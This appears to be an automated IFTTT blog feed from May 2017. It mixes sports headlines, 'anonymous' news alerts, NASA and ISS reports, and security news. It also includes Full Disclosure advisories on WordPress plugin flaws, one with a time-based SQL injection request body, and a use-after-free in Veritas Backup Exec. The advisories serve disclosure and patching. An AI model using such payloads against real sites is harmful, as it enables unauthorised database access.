Orioles: Adam Jones expected to miss Sunday's game vs. Astros due to ankle and hip injuries (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous

More from Alina Belogolova · Character Illustration · Bot Design Studio · "Sea Fairy Tale" Brand Identity · TeamUp App ...

from Google Alert - anonymous http://ift.tt/2qvafxy
via IFTTT

Anonymous Muslim opens arms to grieving Mancunians

Young Muslim Baktash Noori stands blindfolded on a street in Manchester holding a sign that reads "I'm Muslim and I trust you. Do you trust me ...

from Google Alert - anonymous http://ift.tt/2quEZyA
via IFTTT

Orioles: Adam Jones not in lineup Saturday vs. Astros; Joey Rickard will start in CF and bat leadoff (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Ravens: Dennis Pitta has theory that his $2.5 million pay cut went towards Brandon Williams' $52.5 million deal; "He owes me something" (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Applications for 2017 Special Grants program

Applications are now open for the 2017 Special Grants program. The submission deadline is June 15, 2017. Visit the Special Grants page to learn ...

from Google Alert - anonymous http://ift.tt/2rIhJC2
via IFTTT

Mike Pence Is Toast: Anonymous Letter To WaPo Shows The Role Of Eric Prince In Trump-Russia

Mike Pence lost all plausible deniability about his alleged ignorance of all things Russian today, if the Washington Post is correct that Pence ...

from Google Alert - anonymous http://ift.tt/2qphlEL
via IFTTT

2015-2016 E Nino: Daily Sea Surface Temperature Anomaly and ocean currents

E Niño is a recurring climate pattern characterized by warmer than usual ocean temperatures in the equatorial Pacific. This 3-D visualization tracks the changes in ocean temperatures and currents, respectively, throughout the life cycle of the 2015-2016 El Niño event, chronicling its inception in early 2015 to its dissipation by April 2016. Blue regions represent colder temperatures and red regions warmer temperatures when compared with normal conditions. Under normal conditions, equatorial trade winds in the Pacific Ocean blow from the east to the west, causing warm water to pile up in the Western Pacific, while also causing an upwelling- the rise of deep, cool water to the surface- in the Equatorial Pacific. During an El Niño, trade winds weaken or, as with this latest event, sometimes reverse course and blow from west to east. As a result, the warm surface water sloshes east along the equator from the Western Pacific and temporarily predominates in the Central and Eastern Pacific Ocean. At that time, cooler water slowly migrates westward just off the equator in the Western Pacific. The first visualization shows the 2015-2016 El Nino through changes in sea surface temperature as warmer water moves east across the Pacific Ocean.The Eastern Pacific Ocean undergoes the most warming from July 2015 to January 2016. In the west, just to the north of the equator, cooler waters hit the western boundary and reflect along the equator and then head east starting in February 2016. Just as the warming waves traveled east earlier in the video, these cool waters make their way to the central Pacific, terminating the warming event there. Hand-in-hand with an El Nino's changing sea surface temperatures are the wind-driven ocean currents that move the waters along the equator across the Pacific Ocean. The second visualization depicts these currents, which here comprise the ocean's surface to a depth of 225 meters: Yellow arrows illustrate eastward currents and white arrows are westward currents. The El Nino-inducing westerlies- winds coming from the west that blow east- causing eastward currents to occur in pulses. These visualizations are derived from NASA Goddard's Global Modeling and Assimilation Office, using Modern-Era Retrospective Analysis for Research and Applications(MERRA) dataset, which comprises an optimal combination of observations and ocean and atmospheric models. For more information, see http://ift.tt/2rY4NW1

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2s09WN7
via IFTTT

Flix Anonymous - Episode 27

Steve and Trevor run in slow motion as they review the film adaptation of Baywatch, and get their toes wet when they take on pirates in Pirates of the ...

from Google Alert - anonymous http://ift.tt/2qs605G
via IFTTT

Anonymous author bags top prize for 'Kit Siang racist' contest

The top prize of RM10,000 for Umno information chief Annuar Musa's 'Lim Kit Siang is racist' writing contest was won by an anonymous author.

from Google Alert - anonymous http://ift.tt/2qXrpr5
via IFTTT

"He's going to be one of the top receivers in the league this year" - Mike Wallace very high on Breshad Perriman's 2017 outlook (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 5/25/2017

Grasp Commissioning:  To complete commissioning for the Grasp investigation hardware, Pesquet performed tasks in a seated position. Grasp is intended to provide insight into how the central nervous system integrates information from different sensory modalities encoded in different reference frames to coordinate movements of the hand with objects in the environment.  Performed on the ISS, in conjunction with a series of experiments performed on the ground, Grasp explores the interaction between all of the various sensory cues.   NanoRack Cubesat Deployer (NRCSD) #12 Deploy:  A total of 17 cubesats will be deployed from NRCSD #12. Nine CubeSats were successfully deployed today. The remaining 8 will be deployed tonight and tomorrow. All 17 are from the QB50 constellation of CubeSats that are provided by countries around the world. The constellation aims to study the upper reaches of Earth’s atmosphere over a period of 1 to 2 years. The QB50 satellites conduct coordinated measurements of the thermosphere, a poorly studied and previously inaccessible zone of the atmosphere. The project monitors different gaseous molecules and electrical properties of the thermosphere to better understand space weather and its long term trends. OsteoOmics:  A crewmember will fixate BioCells in two Biocell Habitats today and then inserted the samples into the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  This completes the fourth and final week of OsteoOmics operations.  Crewmembers experience bone loss in orbit, stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone.  Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. Body Measures: Today a 50S subject performed the Body Measures Flight Day 184 session. The crewmember, with assistance from a trained operator, collected Body Measures data after configuring still and video cameras. NASA is collecting in-flight anthropometric data to assess the impact of physical body shape and size changes on suit sizing.  Still and video imagery is captured and a tape measure is used to measure segmental length, height, depth, and circumference data for all body segments (chest, waist, hip, arms, legs, etc.) from astronauts before, during and after their flight missions. Robotics On-Board Trainer (RoBOT): The crew performed a session of this training during which they completed a 30 meter approach, two Capture Point hold runs and 2 meter runs. This activity was in preparation for SpX-11 capture currently scheduled for June 4. Mobile Servicing System (MSS) Operations: Yesterday evening Robotics Ground Controllers powered up the MSS and walked the Space Station Robotic Manipulator System (SSRMS) from Mobile Base System (MBS) Power and Data Grapple Fixture (PDGF) 4 to Node2 PDGF. They then translated the Mobile Transporter (MT) from work site (WS) 6 to WS4. MSS is now in configuration for the SpX-11 Crew Offset Grapples tomorrow. Remote Power Control Module (RPCM) N21B4A_B Trip: Remote Power Controller (RPC) 2 on RPCM N21B4A_B tripped overnight. The RPC supplies power to the Node 2 Starboard Audio Terminal Unit (ATU) 1.  An alternate ATU on the port side of Node 2 is still available for voice, caution and warning tones if needed.  Preliminary review of telemetry did not indicate an overcurrent condition. Today, ground teams attempted to reclose the RPC without success. Teams are continuing to assess their forward plan.   Today’s Planned Activities All activities were completed unless otherwise noted. NEUROIMMUNITET. Saliva sample collection Biochemical Urine Test NEUROIMMUNITET. Closeout Ops URISYS Hardware Stowage Body Measures Equipment Gather EHS Total Organic Carbon Analyzer (TOCA) Water Recovery System (WRS) Sample Analysis Final unloading of Soyuz 735 container 11Ф732.А0052А17-0 Body Measures Experiment Operations – Subject NanoRacks CubeSat Deployment Photos Body Measures Experiment Operations – Operator Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) gas supply line Leak Check 1 RFID Reader Relocate Crew Departure Preparations for Return to Earth OsteoOmics Fixation Operations Replacement of IELK, [АСУ] funnels М (M) and Ж (F) in Soyuz 733 and Soyuz 735. Seat liner and p/l container replacement Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Sample Data Record OsteoOmics MELFI Insertion 1 NanoRacks CubeSat Deployment Photos OsteoOmics MELFI Insertion 1 Habitability Narrated Task Video Setup – Subject HRF Generic Frozen Blood Collection Setup Alpha Magnetic Spectrometer HRDL Cable Move Habitability Narrated Task Video End – Subject HRF UCB Stow and Retrieval On-board Training (OBT) Dragon Robotics Onboard Trainer (ROBoT) Session 1 Reconnecting SM KURS-P cables from MRM2 port Antenna Feeder to DC1 port antenna feeder Oxygen Generation System (OGS) Sensor PT1 СОЖ maintenance Loading container 11Ф732.А0052А17-0 with return items IMS Update European Modular Cultivation System (EMCS) Air Mix Supply Module Replacement European Modular Cultivation System (EMCS) Gas Valve Open Multi-purpose Small Payload Rack (MSPR) Combustion Chamber (CC) gas supply line Leak Check 2 Oxygen Generation System (OGS) Sensor PT2 Robotics Onboard Training (ROBoT) Session for Dragon Manufacturing Device Feedstock Canister, Extruder Exchange EHS Total Organic Carbon Analyzer (TOCA) Waste Water Bag (WWB) Changeout Dose Tracker Data Entry Subject  Completed Task List Items Veggie 03 Pillow Watering and Photo Potable Water Dispenser (PWD) Filter Remove and Replace (R&R) with Fan Filter Cleaning In-flight Maintenance Steady State Light Module Galley Rack Re-label  Ground Activities All activities were completed unless otherwise noted. JEMRMS/NanoRacks deploy Dragon RoBOT ops Three-Day Look Ahead: Friday, 05/26: OBT Dragon Offset Grapple, EVA loops scrub/conductivity tests, OBT Soyuz drill Saturday, 06/27: Crew off duty, housekeeping Sunday, 06/28: Crew off duty QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node […]

from ISS On-Orbit Status Report http://ift.tt/2r47aq3
via IFTTT

3 Nigerian Scammers Get 235-Years of Total Jail Sentence in U.S.

You may have heard of hilarious Nigerian scams. My all time favourite is this one: A Nigerian astronaut has been trapped in space for the past 25 years and needs $3 million to get back to Earth, Can you help? Moreover, Nigerians are also good at promising true love and happiness. But You know, Love hurts. Those looking for true love and happiness lost tens of millions of dollars over the

from The Hacker News http://ift.tt/2qqf0IH
via IFTTT

Anonymous Labor Of Love For Grieving Families

Mark Ireland creates one-of-a-kind wooden crosses for grieving families he doesn't know.

from Google Alert - anonymous http://ift.tt/2r1QPSF
via IFTTT

Does a service exist for having anonymous AMA's?

I'd love to see a service where a user can describe themselves in 1 sentence which kicks off an anonymous AMA. I think this would remove a lot of ...

from Google Alert - anonymous http://ift.tt/2qibqFf
via IFTTT

Alcoholics Anonymous: Actions of Recovery

This meeting is held every Tuesday (unless otherwise noted on the UCF calendar) from 7pm to 8pm at thePoint @ UCF in Research Park: SUITE 135, ...

from Google Alert - anonymous http://ift.tt/2qm2UB4
via IFTTT

Spiral Galaxy NGC 6744

Big, beautiful spiral galaxy NGC 6744 is nearly 175,000 light-years across, larger than our own Milky Way. It lies some 30 million light-years distant in the southern constellation Pavo appearing as a faint, extended object in small telescopes. We see the disk of the nearby island universe tilted towards our line of sight. This remarkably distinct and detailed galaxy portrait covers an area about the angular size of the full moon. In it, the giant galaxy's yellowish core is dominated by the light from old, cool stars. Beyond the core, spiral arms filled with young blue star clusters and pinkish star forming regions sweep past a smaller satellite galaxy at the lower left, reminiscent of the Milky Way's satellite galaxy the Large Magellanic Cloud. via NASA http://ift.tt/2rYmkwq

Anonymous I can not login

I logged in as Anonymous. When I check out, I can not log in again. Since there is no chat room, the entrance section does not come. Can you help me ...

from Google Alert - anonymous http://ift.tt/2rEKIqm
via IFTTT

Texas Lottery Winners Could Stay Anonymous

Texas lawmakers have voted to allow big state lottery winners to remain anonymous. The Senate approved the measure Wednesday night and sent it ...

from Google Alert - anonymous http://ift.tt/2rmWMgl
via IFTTT

why does the anonymous calculate incorrectly

in my code below, i am calculating a result two different ways. When I embed more into the anonymous function, it calculates an incorrect answer.

from Google Alert - anonymous http://ift.tt/2qhDPLQ
via IFTTT

Ravens: Pro Bowler C.J. Mosley missed first week of offseason practices after undergoing shoulder surgery; no timetable for return (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

getAccountName() returns no username for Anonymous user

Since the module replaces entity reference result it currently shows Anonymous () and the bracket does not contain the username anonymous.

from Google Alert - anonymous http://ift.tt/2s0cOsC
via IFTTT

Ravens: TE Maxx Williams (knee) expected to be ready for training camp, according to John Harbaugh (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

All Android Phones Vulnerable to Extremely Dangerous Full Device Takeover Attack

Researchers have discovered a new attack, dubbed 'Cloak and Dagger', that works against all versions of Android, up to version 7.1.2. Cloak and Dagger attack allows hackers to silently take full control of your device and steal private data, including keystrokes, chats, device PIN, online account passwords, OTP passcode, and contacts. What's interesting about Cloak and Dagger attack? The

from The Hacker News http://ift.tt/2rlmrWu
via IFTTT

ISS Daily Summary Report – 5/24/2017

OsteoOmics:  The crew fixated BioCells in Biocell Habitat 1 inserted the sample into the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  Crewmembers experience bone loss in orbit stemming from the lack of gravity acting on their bones. OsteoOmics investigates the molecular mechanisms that dictate this bone loss by examining osteoblasts, which form bone, and osteoclasts, which dissolve bone.  Improved understanding of these mechanisms could lead to more effective countermeasures to prevent bone loss during space missions and in a wide range of disorders on Earth. This may lead to better preventative care or therapeutic treatments for people suffering bone loss as a result of bone diseases like osteopenia and osteoporosis, or for patients on prolonged bed rest. NanoRack Cubesat Deployer (NRCSD) #12: The crew brought the JEM (Japanese Experiment Module) Airlock (JEMAL) Slide Table (ST) into the ISS and replaced the NRCSD #11 Quad deployers with the NRCSD #12 deployers.  The ST was then retracted into the JEMAL which was depressurized and vented.  These activities are in preparation for the planned deployment of CubeSats from the NRCSD #12 over the next two days. Grip Commissioning:  As part of the ongoing commissioning for the Grip investigation hardware, a crewmember performed tasks in a supine position.  Grip tests how the nervous system takes into account the forces due to gravity and inertia when manipulating objects.  Results from this investigation may provide insight into potential hazards for astronauts as they manipulate objects in different gravitational environments, support design and control of haptic interfaces to be used in challenging environments such as space, and provide information about motor control that will be useful for the evaluation and rehabilitation of impaired upper limb control in patients with neurological diseases.   Fine Motor Skills: The crew completed a series of interactive tasks during a session of FMS which studies how fine motor skills are effected by long-term microgravity exposure, different phases of microgravity adaptation, and sensorimotor recovery after returning to Earth gravity. The goal of the investigation is to determine how fine motor performance in microgravity trends/varies over the duration of a six-month and year-long space mission; how fine motor performance on orbit compare with that of a closely matched participant on Earth; and how performance trends/varies before and after gravitational transitions, including periods of early flight adaptation and very early/near immediate post-flight periods. On-Board Training (OBT) Dragon Rendezvous Review: The crew performed proficiency training on the Dragon mission profile, rendezvous crew procedures, and crew interfaces for monitoring and commanding the vehicle. This training is in preparation for planned SpaceX-11 launch on June 1 and berthing to ISS on June 4.  Today’s Planned Activities All activities were completed unless otherwise noted. Reminder 2 CSA Generic Frozen Blood Collection Reminder 2 Fine Motor Skills МО-8. Configuration Setup REMINDER – ESA ACTIVE DOSIMETER MOBILE UNIT SWAP Body Mass Measurement CSA Generic Frozen Blood Collection 25 Minutes – Subject NEUROIMMUNITET. Saliva Sample. Psychological Test (morning) CSA Generic Frozen Blood Collection – Operator KORREKTSIYA. NEUROIMMUNITET. Collection of Blood Samples NEUROIMMUNITET. Venous blood sample processing (smear) KORREKTSIYA. NEUROIMMUNITET. Processing venous blood sample using Plasma-03 centrifuge CSA Generic Refrigerated Centrifuge Configure Insertion of Russian experiments blood samples into MELFI CSA Generic Refrigerated Centrifuge Spin Conclude Environmental Health System (EHS) Potable Water Dispenser (PWD) Sample Collect [Aborted] CSA Generic Sample MELFI Insertion CSA Generic Frozen Blood Collection Conclude And Stow Fine Motor Skills Experiment Test – Subject МО-8. Closeout Ops Fine Motor Skills Experiment Test – Subject MORNING PREPARATION WORK XF305 Camcorder Setup JAXA PCG Canister Bag CBEF Micro-G Installation JEM Airlock Press Routine Maintenance of H2O [КВ], Air Pressure [КН],  and Drainage [КД ]Valves in SM Rodnik Tanks Pille Dosimeter Readout after US EVA JEM Airlock Leak Check TV Conference with the Participants of Space Science Week in Izhevsk  (Ku + S-band) JEM Airlock Slide Table (ST) Extension to JPM Side Nikon still camera sync with station time NEUROIMMUNITET. Psychological Test NanoRacks CubeSat Deployer Swap ISS Crew departure preparation ISS HAM Radio Power Up ESA Weekly crew conference GRASP Big picture reading OsteoOmics Fixation Operations ZBOOK Hard Drive Installation GRASP additional set-up in seated configuration Environmental Health System (EHS) Coliform Water Processing EHS Total Organic Carbon Analyzer (TOCA) Potable Water Dispenser (PWD) Sample Analysis [Aborted] JEM Airlock Slide Table (ST) Retraction from JPM Side JEM Airlock Depressurization OsteoOmics MELFI Insertion 1 Extravehicular Activity (EVA) Debrief NEUROIMMUNITET. Hair Samples Collection Equipment Stowage under Soyuz 733 center seat. Completion Status Report Note 7 Hardware prep for PAO event. Video and audio signals check Extravehicular Activity (EVA) Air Lock Deconfiguration ESA Monthly Management Conference Inspection and photography of СПА instrumentation block (БА СПА), УС31 and FGB ППС 349 Environmental Health System (EHS) Total Organic Carbon Analyzer (TOCA) Sample Data Record [Aborted] JEM Airlock Vent Audit of RS ISS Docking And Internal Transfer System ССВП items Crew Departure Preparations for Return to Earth JEM Airlock Vent Confirmation On-Board Training (OBT) Dragon OBT Conference On-board Training (OBT) Dragon Rendezvous Review Verification of ИП-1 Flow Sensor Position OsteoOmics Saline Kit Relocate URISIS Hardware Setup On-board Training (OBT) Dragon Robotics Review  Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. MT translation from WS6 to WS4 Dragon OBT Support CubeSat Deployer Swap Support Three-Day Look Ahead: Thursday, 05/25: Body Measures, OsteoOmics, GRASP, Dragon RoBOT OBT, OGS Sensor R&R Friday, 05/26: OBT Dragon Offset Grapple, EVA loops scrub/conductivity tests, OBT Soyuz drill, GRASP Saturday, 06/27: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:   Component Status Elektron Off Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off           [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Full up Trace Contaminant Control System (TCCS) Node 3 Off  

from ISS On-Orbit Status Report http://ift.tt/2rDt9H4
via IFTTT

Wanna Cry Again? NSA’s Windows 'EsteemAudit' RDP Exploit Remains Unpatched

Brace yourselves for a possible 'second wave' of massive global cyber attack, as SMB (Server Message Block) was not the only network protocol whose zero-day exploits created by NSA were exposed in the Shadow Brokers dump last month. Although Microsoft released patches for SMB flaws for supported versions in March and unsupported versions immediately after the outbreak of the WannaCry

from The Hacker News http://ift.tt/2rCznan
via IFTTT

7-Year-Old Samba Flaw Lets Hackers Access Thousands of Linux PCs Remotely

A 7-year-old critical remote code execution vulnerability has been discovered in Samba networking software that could allow a remote attacker to take control of an affected Linux and Unix machines. Samba is an open-source software (re-implementation of SMB networking protocol) that runs on the majority of operating systems available today, including Windows, Linux, UNIX, IBM System 390, and

from The Hacker News http://ift.tt/2rCdPL0
via IFTTT

Wastelanders.webcomic.ws

Wastelanders Webcomic. , Wastelanders Anonymous , Average Rating: 5 (12 votes) 224 , , , Dark indeed, huh. Check it out- More guilt tripping fanart.

from Google Alert - anonymous http://ift.tt/2qe899V
via IFTTT

Star Cluster, Spiral Galaxy, Supernova

A cosmic snapshot from May 19, this colorful telescopic field of view spans about 1 degree or 2 full moons on the sky. Spiky in appearance, foreground Milky Way stars are scattered toward the royal constellation Cepheus while stars of open cluster NGC 6939 gather about 5 thousand light-years in the distance near the top of the frame. Face-on spiral galaxy NGC 6946 is toward the lower left nearly 22 million light-years away. The helpful red lines identify recently discovered supernova SN 2017eaw, the death explosion of a massive star nestled in the galaxy's bluish spiral arms. In fact in the last 100 years, 10 supernovae have been discovered in NGC 6946. By comparison, the average rate of supernovae in our Milky Way is about 1 every 100 years or so. Of course, NGC 6946 is also known as The Fireworks Galaxy. via NASA http://ift.tt/2qjJIDn

UNO professor talks dangers of media using anonymous sources

UNO professor talks dangers of media using anonymous sources. by Caiti Blase. University of Nebraska Omaha Professor Hugh Reilly talks dangers ...

from Google Alert - anonymous http://ift.tt/2qirYcc
via IFTTT

Can someone answer this about Anonymous Links?

Hi everyone, My company is exploring enableing anonymous links for OneDrive but we only want to do it for certain users when it's needed. The idea ...

from Google Alert - anonymous http://ift.tt/2qXKgCU
via IFTTT

JuliaLang/julia

If I capture a state object in an anonymous function it tends to generate reasonable code. However, it fails in some cases to propagate constants, ...

from Google Alert - anonymous http://ift.tt/2qdwMnh
via IFTTT

[FD] DefenseCode ThunderScan SAST Advisory: WordPress AffiliateWP Plugin Security Vulnerability

DefenseCode ThunderScan SAST Advisory WordPress AffiliateWP Plugin Security Vulnerability Advisory ID: DC-2017-05-05 Advisory Title: WordPress AffiliateWP Plugin Security Vulnerability Advisory URL: http://ift.tt/2rhPqdW Software: WordPress AffiliateWP Plugin Language: PHP Version: 2.0.8 and below (taken from the official GitHub repo) Vendor Status: Vendor contacted, update released Release Date: 2017/05/24 Risk: Medium 1. General Overview =================== During the security audit of AffiliateWP plugin for WordPress CMS, security vulnerability was discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://ift.tt/Vn2J4r 2. Software Overview ==================== According to the plugin developers, AffiliateWP is an easy-to-use, reliable WordPress plugin that gives you the affiliate marketing tools you need to grow your business and make more money. In 2016 it surpassed $500,000 in annual revenue: http://ift.tt/2i6P0CL Homepage: https://affiliatewp.com http://ift.tt/1S60OkI 3. Vulnerability Description ================================== During the security analysis, ThunderScan discovered Cross-Site Scripting vulnerability in AffiliateWP WordPress plugin. The Cross-Site Scripting vulnerability can enable the attacker to construct the URL that contains malicious JavaScript code. If the administrator of the site makes a request to such an URL, the attacker's code will be executed, with unrestricted access to the WordPress site in question. The attacker can entice the administrator to visit the URL in various ways, including sending the URL by email, posting it as a part of the comment on the vulnerable site or another forum. 3.1 Cross-Site Scripting Vulnerable Function: echo Vulnerable Variable: $_REQUEST['filter_from'] Vulnerable URL: http://ift.tt/2rhGYLt File: AffiliateWP-master\includes\admin\referrals\class-list-table.php

Source: Gmail -> IFTTT-> Blogger

[FD] DefenseCode ThunderScan SAST Advisory: WordPress Huge-IT Video Gallery Plugin Security Vulnerability

DefenseCode ThunderScan SAST Advisory WordPress Huge-IT Video Gallery Plugin Security Vulnerability Advisory ID: DC-2017-01-009 Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection vulnerability Advisory URL: http://ift.tt/2rhPqdW Software: WordPress Huge-IT Video Gallery plugin Language: PHP Version: 2.0.4 and below Vendor Status: Vendor contacted, update released Release Date: 2017/05/24 Risk: High 1. General Overview =================== During the security audit of Huge-IT Video Gallery plugin for WordPress CMS, security vulnerability was discovered using DefenseCode ThunderScan application source code security analysis platform. More information about ThunderScan is available at URL: http://ift.tt/Vn2J4r 2. Software Overview ==================== According to the developers, Gallery Video plugin was created and specifically designed to show video links in unusual splendid gallery types supplemented of many gallery options. According to wordpress.org, it has more than 40,000 active installs. Homepage: http://ift.tt/1rHN019 http://ift.tt/2rhvXtL 3. Vulnerability Description ================================== During the security analysis, ThunderScan discovered SQL injection vulnerability in Huge-IT Video Gallery WordPress plugin. The easiest way to reproduce the vulnerability is to visit the provided URL while being logged in as administrator or another user that is authorized to access the plugin settings page. Users that do not have full administrative privileges could abuse the database access the vulnerability provides to either escalate their privileges or obtain and modify database contents they were not supposed to be able to. Due to the missing nonce token, the attacker the vulnerable code is also directly exposed to attack vectors such as Cross Site request forgery (CSRF). 3.1 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://ift.tt/2rQWVWf Vulnerable Body: cat_search=DefenseCode AND (SELECT * FROM (SELECT(SLEEP(5)))DC) File: gallery-video\includes\admin\class-gallery-video-galleries.php

Source: Gmail -> IFTTT-> Blogger

[FD] Sunell IPR54/14AKDN(II)/13 IP Camera - Session ID Enumeration

[FD] Sunell IPR54/14AKDN(II)/13 IP Camera - Reflected Cross-Site Scripting

[FD] Sunell IPR54/14AKDN(II)/13 IP Camera - Stored Cross-Site Scripting

Answers

The anonymous function is for instance %n-variable Schwefel function %MULTI-MODAL % From http://ift.tt/2gQu9yy func = @(X) ...

from Google Alert - anonymous http://ift.tt/2qlcEuH
via IFTTT

Anonymous donation gives 2 high school seniors $50K scholarships

Anonymous donation gives 2 high school seniors $50K scholarships. Olabisi Bolanle and Shyaoman Zhang were shocked to find out on Wednesday, ...

from Google Alert - anonymous http://ift.tt/2qQo4Kd
via IFTTT

How Alcoholics Anonymous Psychologically Abuses The Marginalized

When I joined Alcoholics Anonymous and its spin-off, Narcotics Anonymous, I was seeking escape from my dependence on opiates and alcohol.

from Google Alert - anonymous http://ift.tt/2ql5syC
via IFTTT

"We have an opportunity to be legendary" - Ravens S Tony Jefferson has high hopes for team's defense (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

[FD] CVE-2017-8895 / VTS17-006: UAF in Veritas Backup Exec Remote Agent for Windows

Affected software: Veritas (previously Symantec) Backup Exec Remote Agent for Windows Affected versions: All versions before Backup Exec 16 FP1, Backup Exec 15 14.2.1180.3160, Backup Exec 2014 14.1.1187.1126 Vulnerability type: Use-after-free Impact: Unauthenticated remote code execution as SYSTEM user Solution: Install the latest version across all hosts with the agent installed Website: http://ift.tt/2cll2oh Vendor disclosure: http://ift.tt/2qcRMKY Summary: The Backup Exec Remote Agent for Windows is vulnerable to a use-after-free in its handling of SSL/TLS-wrapped NDMP connections. If SSL/TLS is established on a NDMP connection, ended, and finally re-established, the agent will re-use previously freed SSL/TLS structures. This allows for remote code execution over an unauthenticated network connection. (Note: the requirement for authentication given in the MITRE CVE description is incorrect; no authentication is required.) Detail: The agent accepts NDMP connections on TCP port 10000. The vendor-specific `0xF383` NDMP packet type allows for NDMP connections to be wrapped in a SSL/TLS session. Sub-type `4` initiates the SSL/TLS handshake; after successfully completing this the client and server continue the NDMP session through the SSL/TLS session. The agent makes use of OpenSSL to handle these SSL/TLS sessions. When a SSL/TLS session is created, the agent creates necessary OpenSSL structures, including a `struct BIO` from the connection's associated network socket using `BIO_new_socket`. Upon the end of the SSL/TLS session, this structure is freed by a call to `BIO_free` through a call to `SSL_free`. However, if a SSL/TLS connection is then re-established on the same NDMP connection, the previously freed `BIO` is re-used in the new SSL/TLS session even though it is no longer allocated. The `BIO` is stored during the first connection setup and then retrieved during second connection setup as a member of the `CSecuritySSLConnection` class, despite the call to `SSL_free` previously freeing it. This leads to a use-after-free as the `BIO` contains a pointer to a structure (`BIO_METHOD *method`) of function pointers that are used to perform operations such as reading and writing from the wrapped `BIO` object (in this case, the network socket). By overwriting the previously allocated `BIO` with controlled data, it is possible to gain remote code execution when OpenSSL attempts to call one of these function pointers. - Matthew Daley

Source: Gmail -> IFTTT-> Blogger

Orioles release OF Michael Bourn from minor league contract, making him free agent; hit .220 in 11 games with Triple-A Norfolk (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles Interview: Welington Castillo on difficulty of catching Zach Britton, Manny Machado's brilliance and more; listen now in ESPN App (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Secure VPN Services With Lifetime Subscription (Save up to 95%) - Limited Time Deal

PRIVACY – a bit of an Internet buzzword nowadays, because the business model of the Internet has now shifted towards data collection. Today, most users surf the web unaware of the fact that websites and online services collect their personal information, including search histories, location, and buying habits and make millions by sharing your data with advertisers and marketers. If this is

from The Hacker News http://ift.tt/2rQ8JIj
via IFTTT

ISS Daily Summary Report – 5/23/2017

External (EXT) Multiplexer/Demultiplexer (MDM)-1 R&R Extravehicular Activity (EVA):  With IV support from Thomas Pesquet, today Peggy Whitson (EV1) and Jack Fischer (EV2) performed a 2 hour 46 minute EVA to Remove & Replace (R&R) the EXT MDM-1 that failed on Saturday, May 20th. While Whitson performed the EXT MDM R&R, Fischer installed the Lab Nadir External Wireless Communications (EWC) Antennas that were deferred from the last EVA. Solar Array Battery 3A1 Temperatures – On 5/22/17, Battery 3A1 average temperatures peaked above 25°C for three concurrent orbits due to high solar beta, with a maximum average temperature peak of 25.6°C.  Per Flight Rule, ground controllers terminated the use of the battery string by turning the Battery Charge Discharge Unit (BCDU) 3A1 converter off and commanding the Fault Isolator (FI) open.  There is no impact to downstream loads in this configuration Today’s Planned Activities All activities were completed unless otherwise noted. External Wireless EVA Inhibit ISS HAM Radio Power Down EVA COTS UHF Communication Unit (CUCU)  Verify off USOS Window Shutter Close Extravehicular Activity (EVA) In-Suit Light Exercise (ISLE) Preparation Comm configuration for EVA Regeneration of Micropurification Unit (БМП) Ф2 Cartridge (start) Recharging Soyuz 733 Samsung PC Battery  ISS Crew departure preparation Update BRI Configuration File to Version 6.3 Recharging Soyuz 735 Samsung PC Battery Extravehicular Mobility Unit (EMU) Purge LBNP Training (PRELIMINARY) Extravehicular Mobility Unit (EMU) In-Suit Light Exercise (ISLE) Prebreathe Soyuz 733 IRIDIUM phone recharge, setup, start charge (ФГБ1ПГО_2_224_1, 0.5 СТВ 1017 (002857J), Soft Container (00044322R)) Soyuz 733 Recharging IRIDIUM Phone battery charge status Prebreathe in EMU БРП-М water sampling to drink bags Soyuz 733 IRIDIUM phone recharge, terminate charge Equipment Stowage under Soyuz 733 center seat  Note 7 Sampling condensate water [КАВ] before СРВ-К2М Gas-liquid mixture filter (ФГС) to drink bags, end Crewlock Depress СВО-ЗВ water sampling to Russian drink bags Crewlock Egress Terminate Soyuz 735 Samsung PC Battery Charge (as necessary) Replace Failed EXT MDM Install Lab EWC Antennas KORREKTSIYA. Logging Liquid and Food (Medicine) Intake Collecting condensate water samples [КАВ] up to СРВ-К2М БКО, equipment setup, sampler installation Crewlock Ingress Crew Departure Prep MORZE. Psycho-physiological Evaluation: Strelau Test Crewlock Ingress Soyuz 735 IRIDIUM phone charge EVA Glove Photo Setup Crewlock Pre Repress Soyuz 735 IRIDIUM phone charge, terminate charge, teardown of the 